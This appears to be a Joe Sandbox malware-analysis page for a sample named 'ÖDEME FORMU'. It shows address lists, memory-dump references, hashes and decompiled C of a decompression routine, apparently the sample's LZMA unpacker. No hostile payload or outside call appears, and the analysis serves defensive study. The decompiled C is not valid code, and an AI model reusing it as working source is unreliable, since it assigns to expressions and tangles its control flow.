0x004064ff
0x00406515
0x0040651a
0x00406552
0x00406552
0x00406556
0x00406582
0x00406584
0x0040658b
0x0040658e
0x00406591
0x00406591
0x00406596
0x00406596
0x00406598
0x0040659b
0x004065a2
0x004065a5
0x004065d2
0x004065d2
0x004065d5
0x004065d8
0x0040664c
0x0040664c
0x0040664c
0x00000000
0x0040664c
0x004065da
0x004065e0
0x004065e3
0x004065e6
0x004065e9
0x004065ec
0x004065ef
0x004065f2
0x004065f5
0x004065f8
0x004065fb
0x00406614
0x00406616
0x00406619
0x0040661a
0x0040661d
0x0040661f
0x00406622
0x00406624
0x00406626
0x00406629
0x0040662b
0x0040662e
0x00406632
0x00406634
0x00406634
0x00406635
0x00406638
0x0040663b
0x004065fd
0x004065fd
0x00406605
0x0040660a
0x0040660c
0x0040660f
0x0040660f
0x0040663e
0x00406645
0x004065cf
0x004065cf
0x004065cf
0x004065cf
0x00000000
0x00406647
0x00000000
0x00406647
0x00406645
0x00406558
0x0040655b
0x0040655d
0x00406560
0x00406563
0x00406566
0x00406568
0x0040656b
0x0040656e
0x0040656e
0x00406571
0x00406571
0x00406574
0x0040657b
0x0040654f
0x0040654f
0x0040654f
0x0040654f
0x00000000
0x0040657d
0x00000000
0x0040657d
0x0040657b
0x00406501
0x00406504
0x00406506
0x00406509
0x00000000
0x00000000
0x00406268
0x00406268
0x0040626c
0x004068b1
0x00000000
0x004068b1
0x00406272
0x00406275
0x00406278
0x0040627b
0x0040627e
0x00406281
0x00406284
0x00406286
0x00406289
0x0040628c
0x0040628f
0x00406291
0x00406291
0x00406291
0x00000000
0x00000000
0x004063f3
0x004063f3
0x004063f7
0x004068bd
0x00000000
0x004068bd
0x004063fd
0x00406400
0x00406403
0x00406406
0x00406408
0x00406408
0x00406408
0x0040640b
0x0040640e
0x00406411
0x00406414
0x00406417
0x0040641a
0x0040641b
0x0040641d
0x0040641d
0x0040641d
0x00406420
0x00406423
0x00406426
0x00406429
0x00406429
0x00406429
0x0040642c
0x0040642e
0x0040642e
0x00000000
0x00000000
0x00406670
0x00406670
0x00406670
0x00406674
0x00000000
0x00000000
0x0040667a
0x0040667d
0x00406680
0x00406683
0x00406685
0x00406685
0x00406685
0x00406688
0x0040668b
0x0040668e
0x00406691
0x00406694
0x00406697
0x00406698
0x0040669a
0x0040669a
0x0040669a
0x0040669d
0x004066a0
0x004066a3
0x004066a6
0x004066a9
0x004066ad
0x004066af
0x004066b2
0x00000000
0x004066b4
0x00406431
0x00406431
0x00000000
0x00406431
0x004066b2
0x004068e7
0x00000000
0x00000000
0x00405f16
0x0040691e
0x0040691e
0x00000000
0x0040691e
0x0040676b
0x004066f2
0x004066ef
0x00000000
0x00406444

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eca11b504c20c6a4dff8dbd418dcdd560ad59529dc9179efd0dbdc64f654f703
Instruction ID: e3f6d56364c83544c85f79d99d02007aa6d07438f45ea059adc5b55077a757f2
Opcode Fuzzy Hash: eca11b504c20c6a4dff8dbd418dcdd560ad59529dc9179efd0dbdc64f654f703
Instruction Fuzzy Hash: 30714671D00229CFDF28CF98C844BADBBB1FB44305F25816AD856BB281D7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 0040638C Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040638C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406926))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
